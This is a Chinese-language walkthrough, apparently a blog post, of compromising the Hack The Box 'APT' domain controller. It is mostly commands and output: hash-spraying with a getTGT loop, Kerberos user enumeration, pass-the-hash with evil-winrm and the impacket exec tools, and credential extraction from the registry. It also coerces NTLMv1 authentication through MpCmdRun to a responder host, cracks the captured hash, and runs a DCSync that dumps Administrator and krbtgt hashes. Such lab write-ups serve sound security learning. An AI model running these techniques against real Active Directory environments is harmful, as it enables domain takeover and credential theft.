kazuo.deleon:3203:aad3b435b51404eeaad3b435b51404ee:fde29e6cb61b4f7fda1ad5cd2759329d:::
dacy.frederick:3204:aad3b435b51404eeaad3b435b51404ee:51d368765462e9c5aebc456946d8dc86:::
emeline.boone:3205:aad3b435b51404eeaad3b435b51404ee:273c48fb014f8e5bf9e2918e3bf7bfbd:::
baris.martin:3206:aad3b435b51404eeaad3b435b51404ee:98590500f99a1bee7559e97ad342d995:::
mea.cash:3207:aad3b435b51404eeaad3b435b51404ee:10cf01167854082e180cf549f63c0285:::

这里的格式是：用户名:用户SID值:LM Hash:NTLM Hash::: 但是包含的数据不仅仅有这种格式。发现一篇博客介绍 NTLM 很不错：Windows下的密码hash——NTLM hash和Net-NTLM hash介绍 (3gstudent.github.io)

内容比较多，一共包含了八千多条信息。我们先看前二十个，虽然里面第一个就是 Administrator 的哈希，但是考虑到靶机的难度，这里直接使用哈希传递攻击获得管理员权限的概率很低，依然可以尝试。这里用到的 evil-winrm 工具的详细介绍可以看看这篇博客 A Detailed Guide on Evil-Winrm - Hacking Articles。需要补充的是，evil-winrm 默认端口是 5985，再就是 evil-winrm 是可以加载本地 powershell 脚本和 exe 允许文件的，详细过程可在上面的博客中找到。

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ evil-winrm -i htb.local -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

另外，secretdump 导出的信息中包含不同类型的数据

这里我们最应该关注的是 Windows NTLM 哈希，值得注意的是 用户名:用户SID值:LM Hash:NTLM Hash::: 格式中一般 LM Hash 一般为 d167c3238864b12f5f82feae86a7f798 意为无密码的 LM 哈希

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ grep ":::" user_hash_raw | wc -l
2000
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ grep ":::" user_hash_raw | awk -F ':' '{printf "%s:%s\n",$3,$4}' > hash_list
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ grep ":::" user_hash_raw | awk -F ':' '{print $1}' > user_list

接下来要进行碰撞，由于数据量比较大，我们优先筛选一下有效的用户名。

Kerbrute 用户枚举

这里涉及到预认证机制，建议再看看 Kerberos 协议 AS_REQ 阶段的过程。这里我们要用的是 Kerbrute 工具。

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ ./kerbrute_linux_amd64 userenum -d htb.local --dc htb.local user_list

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/31/23 - Ronnie Flathers @ropnop

2023/10/31 09:42:46 >  Using KDC(s):
2023/10/31 09:42:46 >   htb.local:88

2023/10/31 09:42:51 >  [+] VALID USERNAME:       Administrator@htb.local
2023/10/31 09:42:51 >  [+] VALID USERNAME:       APT$@htb.local
2023/10/31 09:46:43 >  [+] VALID USERNAME:       henry.vinson@htb.local
2023/10/31 10:00:03 >  Done! Tested 2000 usernames (3 valid) in 1037.577 seconds

需要等待的时间较长，我们也可以使用 nmap 脚本来交叉验证

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -6 -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=user_list htb.local
[sudo] password for i3eg1nner:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-31 10:07 EDT
Nmap scan report for htb.local (dead:beef::b885:d62a:d679:573f)
Host is up (0.079s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     Administrator@htb.local
|     APT$@htb.local
|_    henry.vinson@htb.local

Nmap done: 1 IP address (1 host up) scanned in 17.14 seconds

扫描结果一致，且 nmap 扫描速度快得多。

接下来尝试使用 crackmapexec 工具来对 smb, ladp, winrm 进行哈希传递攻击，这里红队笔记 UP 触发了防护机制，导致 IP 被禁，这里只放一张截图，留作备注

那么就不能直接使用此工具来爆破了，HTB 官方 WP 中提到 Kerbrute doesn't support bruteforcing hashes 因此换了工具：有中文的解释，建议读一读渗透技巧——通过Kerberos pre-auth进行用户枚举和口令爆破 (3gstudent.github.io) 不过还是需要自己修改脚本的，那不如按找红队笔记 UP 的思路接着走

GetTGT 爆破

这里我们要进行碰撞，需要用到 impacket-getTGT 工具，这里要写个调用的脚本

#!/bin/bash 

while IFS='' read -r LINE || [ -n "${LINE}" ]
do
	echo "------"
	echo "Feed the Hash:${LINE}"
	impacket-getTGT htb.local/henry.vinson@htb.local -hashes ${LINE} 
done < hash_list

impacket-getTGT 如果成功，则会在当前目录生成票据文件，因此可以监控目录中的文件数量，当数量变化时，关闭脚本，从而不至于淹没在脚本的大量输出中。

复现的时候遇到了一个问题，并没有如预期中那样，生成 henry.vinson@apt.htb.ccache 文件，我还是淹没在了输出中。接下来属于排查的过程，假设通过耐心翻找发现了目标哈希，此时的输出是这样的

------
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
------

关键词 Clock skew too great 我们继续搜索 Kerberoast - HackTricks

还有一篇 APT 靶机的 WP，也提到了这个问题 Hack the Box - APT Writeup | Hacker’s Rest (zweilosec.github.io)

作者经过排查发现，是自己之前曾经在打靶机的时候，与另一台靶机进行了时钟同步导致的……我也突然意识到，我和作者是同样的错误，难绷。同时 APT 靶机并没有时钟同步服务，幸好翻到了这篇博客，不然自己排查不知道要花多少时间。

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo ntpdate pool.ntp.org
[sudo] password for i3eg1nner:
2023-10-31 05:18:23.410441 (-0400) -28790.653051 +/- 1.006571 pool.ntp.org 204.2.134.162 s3 no-leap
CLOCK: time stepped by -28790.653051
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ impacket-getTGT -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Saving ticket in henry.vinson@htb.local.ccache

找到了这个意外的原因。事后诸葛亮一下，其实我们可以通过 Saving ticket 作为关键词搜索结果，如果和我刚才一样遇到了时钟同步的问题，那么可以使用 Clock skew 作为关键词。但是如果我并不知道这两个关键词呢？尝试自己改了一下脚本的逻辑：

#!/bin/bash 

while IFS='' read -r LINE || [ -n "${LINE}" ]
do
	echo "------"
	echo "Feed the Hash:${LINE}"
	impacket-getTGT htb.local/henry.vinson@htb.local -hashes ${LINE} | grep -q "invalid"
	if [ $? -eq 0 ]; then  
    	echo ""  
	else  
    	echo "success!!!!"
    	break
	fi
done < hash_list

基于错误结果的观察，增加了关于是否有 invalid 关键词的判断，若不存在此关键词，则认为成功，终止程序。

横向移动

哈希传递攻击尝试

接下来要开始尝试哈希传递攻击

//evil-winrm 进行哈希传递攻击只需要NTLM Hash即可
evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb' 

psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

 Impacket’s Implementation creates a remote service by uploading a randomly-named executable to the hidden Windows ADMIN$ share, registering a service via RPC and the Windows Service Control Manager, and then communicating over named a named pipe.And it will often get caught by antivirus. Psexec requires credentials for a user with local administrator privileges or higher since reading/writing to the ADMIN$ share is required.
 use exit command instand of ctrl + C

wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

Wmiexec.py runs commands as the authenticated local administrator, rather than NT AUTHORITY\SYSTEM .Wmiexec.py uses the Windows Management Instrumentation and DCOM to create a windows process to run commands. Like some of the above methods, it writes the output out to a temp file in an SMB share ( ADMIN$ by default) and then retrieves the output and deletes the file.

dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local 

Dcomexec.py uses the Distributed Component Object Model (DCOM) to execute commands.

smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

smbexec creates a batch file for each command that you run, then creates a service to run the file using cmd.exe. It redirects STDOUT and STDERR to a temporary file on a readable SMB share.This will generate a lot of windows event logs since you’re creating and deleting a lot of services

reg.py

reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\

This Impacket script is ripped straight out of the reg.exe of the Windows OS. Reg.exe is an executable service that can read, modify and delete registry values when used with eh combination of the query, add, delete keywords respectively. We can even begin to express the importance of access to the registry. Registry controls each and every aspect of the system. It can be used to gain information about the various policies, software and also alter some of those policies.

HKU 主键存储的主要是用户凭据相关的信息，因此这里首先尝试查询HKU

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment

HKU 包括对于用户和软件的信息，因此我们优先查看 Software，通过对注册表的枚举，我们得到了 GiganticHostingManagementSystem ，这个关键词和 Web 界面的 title 是一致的，所以继续查看

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\
HKU\Software\\GiganticHostingManagementSystem
HKU\Software\\Microsoft
HKU\Software\\Policies
HKU\Software\\RegisteredApplications
HKU\Software\\Sysinternals
HKU\Software\\VMware, Inc.
HKU\Software\\Wow6432Node
HKU\Software\\Classes

也可以使用 impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU -s 来获取 HKU 下的所有键值

发现了用户名和密码

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem\\Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht

Getshell

使用此用户名和密码继续尝试横向移动

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ evil-winrm -i htb.local -u henry.vinson_adm -p G1#Ny5@2dvht

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> 

成功 Getshell，在桌面中找到了 flag

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> dir C:\Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   7:54 AM                Administrator
d-----        9/24/2020   8:39 AM                henry.vinson
d-----        9/24/2020   8:40 AM                henry.vinson_adm
d-r---       11/21/2016   2:39 AM                Public

提权

四处翻找一下，看看有哪些提权路径

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> dir C:\


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   8:30 AM                backup
d-----        9/24/2020   8:19 AM                inetpub
d-----        9/16/2020   7:45 PM                PerfLogs
d-r---       10/22/2020   5:52 PM                Program Files
d-----       11/21/2016   2:36 AM                Program Files (x86)
d-----        9/24/2020  11:05 AM                scripts
d-r---        9/24/2020   8:40 AM                Users
d-----        3/17/2021   3:33 PM                Windows

backup 目录是之前 smb 获取到的共享目录。

*Evil-WinRM* PS C:\backup> dir


    Directory: C:\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/24/2020   8:30 AM       10650961 backup.zip

接下来就是重复翻找的过程，在 Windows Defender 下发现了 MpCmdRun.exe ，利用方法在 Mpcmdrun | LOLBAS (lolbas-project.github.io) 属于 live off the land 思想。但是这里我们并不是要使用它来下载文件，而是建立连接，可以查看微软官方文档 Use the command line to manage Microsoft Defender Antivirus | Microsoft Learn

MpCmdRun.exe -Scan -ScanType 3 -File \\$IP\noextist

历史文件

借助于 Auto_Words 中的文件包含目录，搜索 passw 和 history 关键词，发现了

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type C:/users/henry.vinson_adm/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

而这里出现的获取 administrator 凭证，以及将 lmcompatibilitylevel 设置为 2 都值得我们注意。搜索关键词 lmcompatibilitylevel 2 第一个链接就是微软的官方文档

其中提到了客户端使用 NTLMV1 认证，服务器端可以使用 NTLMV1 或 NTLMV2。NTLMV1 实际上是可以被破解的，我们在这里可以进行一些操作，使用的工具是 responder

NTLMv1 attack using responder

NTLM - HackTricks 中有关于 NTLMv1 attack 的描述，Windows下的密码hash——Net-NTLMv1介绍 (3gstudent.github.io) 中有一些关于原理的大概介绍。

responder 在 kali 中默认安装，其配置文件位于 /etc/responder/Responder.conf ，修改配置中的 challenge set 值为 1122334455667788

附注：当输入域名的时候首先使用域名文件 hosts，然后寻找 DNS 缓存，进而是 Web DNS 服务器，最后是在本地使用这三种协议进行寻找（类似于 ARP 的逻辑）推荐阅读：内网渗透之Responder攻防（上） - FreeBuf网络安全行业门户

首先攻击机使用 responder 开启服务。

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ sudo responder --lm -I tun0 -v

接着使用 MpCmdRun 来进行连接

*Evil-WinRM* PS C:\Program Files\Windows Defender> MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.2\noextist

再次借助于工具，对得到的值进行解析

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt/ntlmv1-multi]
└─$ python ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Hashfield Split:
['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788']

Hostname: HTB
Username: APT$
Challenge: 1122334455667788
LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
CT1: 95ACA8C7248774CB
CT2: 427E1AE5B8D5CE68
CT3: 30A49B5BB858D384

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788

To crack with hashcat create a file with the following contents:
95ACA8C7248774CB:1122334455667788
427E1AE5B8D5CE68:1122334455667788

echo "95ACA8C7248774CB:1122334455667788">>14000.hash
echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384

NTLMv1 哈希爆破

使用 crash.sh 网站尝试获取，网站处于停机维护状态，难绷。试一试 hashcat，上面给的命令不能直接运行，在 DES Full charset error (hashcat.net) 中找到了一种解决方案。

.\hashcat.exe -m 14000 -1 charsets/DES_full.hcchr -a 3 --hex-charset --hex-charset userpasswdhash ?1?1?1?1?1?1?1?1

不过爆破时间太长了……暂时先直接用别人通过网站拿到的结果吧。后续再咨询咨询有没有什么别的思路。

//APT$的哈希
d167c3238864b12f5f82feae86a7f798

secretsdump DC Sync 攻击

这里要注意，就算我们能登录 APT$用户，但是对于拿下整台域控来说，并没有那么大的帮助，联想到之前 backup 压缩包里无效的哈希，这里我们可以尝试使用 impacket-secretdump 来获得凭证。这里本质上属于 DC Sync 攻击。

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt/ntlmv1-multi]
└─$ sudo impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'
[sudo] password for i3eg1nner:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...

evil-winrm 登录

获取到了 administrator 的哈希，尝试 evil-winrm 登录

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt/ntlmv1-multi]
└─$ evil-winrm -i htb.local -u administrator -H 'c370bddf384a691d811ff3495e8a72e2'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        11/1/2023   4:57 AM             34 root.txt

成功。

*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::16c
   IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
   IPv6 Address. . . . . . . . . . . : dead:beef::dc2a:6438:2e17:c0f3
   Link-local IPv6 Address . . . . . : fe80::dc2a:6438:2e17:c0f3%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.213
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:381e%5
                                       10.10.10.2